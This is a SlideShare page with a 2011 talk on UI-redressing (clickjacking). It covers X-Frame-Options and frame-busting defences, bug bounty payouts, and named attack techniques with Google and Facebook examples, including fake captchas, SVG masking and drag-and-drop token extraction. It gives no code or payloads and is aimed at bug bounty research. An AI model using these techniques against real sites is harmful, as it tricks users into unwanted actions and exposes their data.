Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Make Profit with UI-Redressing                                    AMol NAik                http://amolnaik4.blogspot.com
Agenda   UI-Redressing   Server-Side Mitigations   How to make Profit?   What to Target?   Tools to Hack   CSS Basic...
UI-Redressing    Change User Interface in browser    Victim clicks button on attacker site    He/she actually clicking ...
UI-Redressing   Mostly neglected by vendors       Why? – Need user interaction       Browser dependancy   Impact:    ...
Server-Side Mitigations   X-Frame-Options       Response Header       Supported by most of the latest browsers       T...
Server-Side Mitigations    Frame Bursting Code        JavaScript        Ensures the current frame is the most top level...
How to make Profit?   Bug Bounties       Google         Pays from $500 to $3133.7         XSS, CSRF are prime focus   ...
What to Target?   CSRF protected actions   Pages with tokens   Self-XSS
Tools to Hack   Browser       I use   Add-ons       Clickjacking Defense – Declarative Security           Created by ...
CSS Basics   Opacity       Set Transparency for the element   Top, Left       Negative values shift elements out of th...
Exploitation Techniques
Exploitation Techniques   Action with Single Click       Technique: Simple Clickjacking       Ex: Remove Google Books
Exploitation Techniques   Action with 2 user clicks       Technique: Fake Arithmetic Captcha       Ex: Remove Google Or...
Exploitation Techniques   Single CSRF token       Technique: Fake Captcha with SVG Masking       Cross-Domain Content E...
Exploitation Techniques   Multiple CSRF tokens in source       Technique: Drag-n-Drop with “view-source”       Cross-Do...
Exploitation Techniques   Self-XSS Exploitation       Technique: Drag-n-Drop       Ex: Google Code XSS
Conclusion   Profit & Fame   Most of the sites didn’t implement protections   Firefox still supports for “view-source” ...
References   https://www.owasp.org/index.php/Clickjacking   http://ui-redressing.mniemietz.de/uiRedressing.pdf   http:/...
Questions            http://twitter.com/amolnaik4
Upcoming SlideShare
Loading in …5
×

Make profit with UI-Redressing attacks.

127,583 views

Published on

By Amol Naik - October 2011 Meet

Published in: Education, Technology, Design

Make profit with UI-Redressing attacks.

  1. 1. Make Profit with UI-Redressing AMol NAik http://amolnaik4.blogspot.com
  2. 2. Agenda UI-Redressing Server-Side Mitigations How to make Profit? What to Target? Tools to Hack CSS Basics Exploitation Techniques Conclusion
  3. 3. UI-Redressing  Change User Interface in browser  Victim clicks button on attacker site  He/she actually clicking button on Vulnerable siteSource: http://www.imperva.com/resources/glossary/clickjacking_ui-redressing.html
  4. 4. UI-Redressing Mostly neglected by vendors  Why? – Need user interaction  Browser dependancy Impact:  Same as CSRF  One click – GONE!!  Bypass CSRF protections  Exploit “Self-XSS”  Cross-domain Content Extraction
  5. 5. Server-Side Mitigations X-Frame-Options  Response Header  Supported by most of the latest browsers  Two possible values to use:  DENY  The page cannot be displayed in a frame, regardless of the site attempting to do so  SAMEORIGIN  The page can only be displayed in a frame on the same origin as the page itself.
  6. 6. Server-Side Mitigations  Frame Bursting Code  JavaScript  Ensures the current frame is the most top level windowSource: https://www.owasp.org/index.php/Clickjacking
  7. 7. How to make Profit? Bug Bounties  Google  Pays from $500 to $3133.7  XSS, CSRF are prime focus  Name will be listed in Google Security Hall of Fame http://www.google.com/about/corporate/company/halloffame.html  Facebook  Starting from $500  XSS, CSRF, Open Redirect, Database Injection  Name will be listed in Facebook WhiteHat http://www.facebook.com/whitehat
  8. 8. What to Target? CSRF protected actions Pages with tokens Self-XSS
  9. 9. Tools to Hack Browser  I use Add-ons  Clickjacking Defense – Declarative Security  Created by Aditya k Sood  Check for “X-Frame-Options”  Firebug  Many uses  CSS editing On-the-Fly
  10. 10. CSS Basics Opacity  Set Transparency for the element Top, Left  Negative values shift elements out of the browser window Position  Specifies the type of positioning method used for an element  Static (default) - The box is a normal box. The top, right, bottom, and left properties do not apply.  Relative - The boxs position is calculated according to the normal flow  Absolute - The boxs position is specified with the top, right, bottom, and left properties  Fixed - The boxs position is calculated according to the absolute model, but in addition, the box is fixed.
  11. 11. Exploitation Techniques
  12. 12. Exploitation Techniques Action with Single Click  Technique: Simple Clickjacking  Ex: Remove Google Books
  13. 13. Exploitation Techniques Action with 2 user clicks  Technique: Fake Arithmetic Captcha  Ex: Remove Google Orkut Service
  14. 14. Exploitation Techniques Single CSRF token  Technique: Fake Captcha with SVG Masking  Cross-Domain Content Extraction  Ex: Facebook XHR
  15. 15. Exploitation Techniques Multiple CSRF tokens in source  Technique: Drag-n-Drop with “view-source”  Cross-Domain Content Extraction  Ex: Facebook PoC
  16. 16. Exploitation Techniques Self-XSS Exploitation  Technique: Drag-n-Drop  Ex: Google Code XSS
  17. 17. Conclusion Profit & Fame Most of the sites didn’t implement protections Firefox still supports for “view-source” scheme Attack technique depends on target Imagination is only the limitation
  18. 18. References https://www.owasp.org/index.php/Clickjacking http://ui-redressing.mniemietz.de/uiRedressing.pdf http://html5sec.org/ http://blog.kotowicz.net/2011/07/cross-domain- content-extraction-with.html http://www.blog.fortitsecurity.com/2011/09/facebook- graph-api-access-token.html http://www.w3.org/TR/CSS2/visuren.html#positioning -scheme
  19. 19. Questions http://twitter.com/amolnaik4

×